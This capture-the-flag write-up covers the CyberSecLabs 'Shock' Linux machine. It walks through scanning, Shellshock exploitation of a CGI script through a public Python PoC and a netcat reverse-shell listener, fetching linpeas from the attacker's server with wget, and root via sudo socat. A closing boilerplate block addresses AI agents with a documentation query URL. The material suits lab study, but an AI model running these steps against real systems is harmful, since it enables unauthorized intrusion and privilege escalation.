# Shock ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-097d749cebd72974f19b283e9a48b1b38c804e8a%2Fimage.png?alt=media) ## Nmap ``` nmap 172.31.1.3 -p- -A 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 12:ee:09:94:d5:4b:4a:d9:3b:95:3a:d6:63:e7:98:6f (RSA) | 256 b9:f8:52:aa:62:02:af:6c:09:ca:dc:3e:7b:b3:94:b7 (ECDSA) |_ 256 53:5d:98:f7:61:e0:57:df:38:96:f9:be:59:77:6c:f4 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Steak House Shock Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` ## FTP Looking at our Nmap results we can start with a check on anonymous login check with FTP. ``` nmap 172.31.1.3 --script=ftp-anon.nse -p 21 PORT STATE SERVICE 21/tcp open ftp ``` We get no feedback regarding anonymous login and will require a manual check. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b2b6a45817b274501bd18dc7dd16b5841ed2320%2Fimage.png?alt=media) As anonymous login for this server is not allowed we can check for exploits on vsFTPd 3.0.3 using searchsploit. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9441af4d7b303588b44ae2e3d37262df952312a4%2Fimage.png?alt=media) I also Google searched and found no current exploits for vsFTPd 3.0.3. We can next take a look at HTTP on port 80 since this is our next best logical attack vector. ## HTTP ![http://172.31.1.3/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-733fd159ac7aff30506096af0304f63ca7c036b1%2Fimage.png?alt=media) I have also started a scan with Nikto on this webpage. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8626b75aa3943fbeb4a6ed9d95f4878bffaa32b4%2Fimage.png?alt=media) ## Exploitation Nikto reports a possible exploit on /cgi-bin/test.cgi to the Shellshock exploit. A brief overview of what is is taken from [www.netsparker.com](https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c16992d1a0734c5871c71e97c0dd5a897256bff2%2Fimage.png?alt=media) ### PoC Searching for HTTP Shellshock PoC's brings us to the following by zalalov on Github. {% embed url="" %} Download the python script and then set up as per the README: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7eaf214c62b89dee478dbcdf36875b8a79965d67%2Fimage.png?alt=media) Start a netcat listener on the attacking machine. ``` nc -lvp 4444 ``` Then call the Python script with the correct arguments for our machine. ``` python2 shellshock.py 172.31.1.3 /cgi-bin/test.cgi /4444 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3730cc0a2a26a25c9f26ed3cb9445efa65375b2%2Fimage.png?alt=media) After a short amount of time we should get a shell back on our listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-337bad1b7eaadbc0379c7152fd6d2670195abcac%2Fimage.png?alt=media) From here we can perform an upgrade on the shell we currently have. ``` /usr/bin/script -qc /bin/bash /dev/null ``` ## Privilege Escalation Next I uploaded linpeas.sh in the attempt to look for any easy privilege escalation vectors. I started a Python SimpleHTTPServer on my attacking machine pointing at my Linux enumeration scripts. ``` Python2 -m SimpleHTTPServer 80 ``` I then performed `wget` on the target file. ``` wget http://:/ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-50433a48551871d77a2b8f0a051be4f4004b2416%2Fimage.png?alt=media) Once completed I executed linpeas.sh and waited for it to complete. Once complete we see we have access to socat using sudo. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-11a9becf57de4fbbe7d1324097dd4b75a10a3f25%2Fimage.png?alt=media) Looking at socat on [GTFObins](https://gtfobins.github.io/gtfobins/socat/) we see we can call bash with root permissions. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-97c4f609b0a40a817e8d6a280940c2411357eea7%2Fimage.png?alt=media) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9b0862607b99ad32246888166426073bf8660f24%2Fimage.png?alt=media) We are now root on the target machine. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/linux/shock.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.